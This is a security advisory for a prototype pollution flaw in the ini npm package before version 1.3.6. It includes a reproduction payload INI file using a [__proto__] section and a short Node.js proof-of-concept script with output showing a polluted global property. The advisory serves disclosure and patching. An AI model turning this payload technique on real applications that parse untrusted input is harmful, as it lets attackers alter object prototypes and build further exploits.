GHSA-qqgx-2p2h-9c37

Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/12/GHSA-qqgx-2p2h-9c37/GHSA-qqgx-2p2h-9c37.json
Aliases
Published
2020-12-10T16:53:45Z
Modified
2022-08-03T23:35:50Z
Details

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
References

Affected packages

npm / ini

ini

Affected ranges

Type
SEMVER
Events
Introduced
0
Fixed
1.3.6

Affected versions